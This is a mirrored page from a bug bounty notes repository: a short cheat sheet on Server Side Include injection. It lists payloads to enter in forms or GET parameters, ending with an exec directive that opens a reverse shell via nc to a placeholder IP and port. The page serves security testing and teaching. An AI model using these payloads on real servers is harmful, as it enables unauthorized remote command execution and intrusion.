mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 10:26:11 +00:00
31 lines
807 B
Markdown
31 lines
807 B
Markdown
|
# Server Side Include Injection (SSI Injection)
|
||
|
|
||
|
## Introduction
|
||
|
SSI (Server Side Includes) Injection is a type of web security vulnerability that occurs when a web application allows untrusted user-supplied data to be used as part of a Server Side Include (SSI) directive
|
||
|
|
||
|
## Where to find
|
||
|
Usually it can be found anywhere. Just try to input the payload in the form or GET parameter
|
||
|
|
||
|
## How to exploit
|
||
|
1. Print a date
|
||
|
```
|
||
|
<!--#echo var="DATE_LOCAL" -->
|
||
|
```
|
||
|
|
||
|
2. Print all the variabels
|
||
|
```
|
||
|
<!--#printenv -->
|
||
|
```
|
||
|
|
||
|
3. Include a file
|
||
|
```
|
||
|
<!--#include file="includefile.html" -->
|
||
|
```
|
||
|
|
||
|
4. Doing a reverse shell
|
||
|
```
|
||
|
<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->
|
||
|
```
|
||
|
|
||
|
## References
|
||
|
* [OWASP](https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection)
|